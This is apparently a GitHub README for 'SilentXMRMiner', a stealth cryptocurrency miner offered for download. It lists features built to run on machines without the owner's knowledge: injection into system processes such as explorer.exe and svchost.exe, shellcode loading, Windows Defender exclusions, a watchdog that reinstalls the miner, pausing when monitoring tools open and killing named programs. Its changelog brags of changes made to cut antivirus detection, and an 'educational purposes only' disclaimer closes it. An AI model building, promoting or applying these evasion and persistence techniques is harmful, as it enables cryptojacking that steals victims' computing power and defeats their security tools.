Skip to content

timedustkajiutec444/SilentXMRminer2024

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

SilentXMRMiner

SilentXMRMiner v1.5.1 - Based on Lime Miner v0.3

Can mine all the following algorithms and thus all the cryptocurrencies that use them:

List of algorithms
AlgorithmExample Cryptocurrency
rx/0Monero
argon2/chukwa2ACoin
rx/arqArQmA
cn-heavy/xhvHaven, Blockcloud
cn/ccxConceal
astrobwtDero
cn/fastElectronero, ElectroneroXP
cn/rwzGraft
rx/kevaKevacoin
cn-picoKryptokrona
cn/halfMasari
argon2/ninjaNinjaCoin
kawpowRavencoin
rx/sfxSafex
cn/rSumokoin
cn-pico/tloTalleo
argon2/chukwav2Turtlecoin
cn/upx2Uplexa
rx/wowWownero
cn/zls
cn/double
cn/2
cn/xao
cn/rto
cn-heavy/tube
cn-heavy/0
cn/1
cn-lite/1
cn-lite/0
cn/0

Main Features

  • Native & .NET - Miner installer and watchdog coded in C#, Shellcode loader/injector coded in C, miner requires .NET Framework 4.5
  • Shellcode - All .NET C# parts are converted into Shellcode and injected using a native C loader, can be disabled
  • Injection (Silent/Hidden) - Hide payload behind another process like explorer.exe, conhost.exe, svchost.exe or other processes
  • CPU & GPU Mining - Can mine on Both CPU and GPU (Nvidia & AMD)
  • Idle Mining - Can be configured to mine at different usages or not at all while computer is or isn't in use
  • Stealth - Pauses the miner and clears the GPU memory while any of the programs in the "Stealth Targets" option are open
  • Watchdog - Replaces the miner file if removed and starts it if the injected miner is closed down
  • Remote Configuration - Can get the miner settings remotely from a URL every 100 minutes
  • Bypass Windows Defender - Adds exclusions into Windows Defender for the general folders the miner uses
  • Process Killer - Constantly checks for any programs in the "Kill Targets" and kills them if found

Downloads

You can download the latest version in the Releases section

Changelog

v1.5.1 (16/07/2024)

  • Added Process Killer feature that constantly checks for the "Kill Targets" programs and kills them if found
  • Changed system calls to direct system calls thus reducing detections
  • Changed native loader code to reduce detections
  • Removed Online Download feature due to domain being taken down
  • Improved overall code
  • Updated miner

v1.5.0 (02/10/2023)

The previous version was supposed to be the last one before the unified miner but I recieved great results by loading everything by Shellcode making it worthwhile to update

  • Added new Shellcode loader, the miner, watchdog and uninstaller will now be converted into shellcode and injected using a native C loader which greatly reduces detections
  • Added custom tcc C compiler to compile the Shellcode loader
  • Added custom windres resource compiler to allow icons, assembly data and run as administrator for the native C program
  • Added donut to convert .NET programs into Shellcode
  • Added option to disable Shellcode loader
  • Remade and optimized much of the miner and watchdog code
  • Removed old C# loader
  • Renamed Install to Startup due to confusion

Disclaimer

I, the creator, am not responsible for any actions, and or damages, caused by this software.

You bear the full responsibility of your actions and acknowledge that this software was created for educational purposes only.

This software's main purpose is NOT to be used maliciously, or on any system that you do not own, or have the right to use.

By using this software, you automatically agree to the above.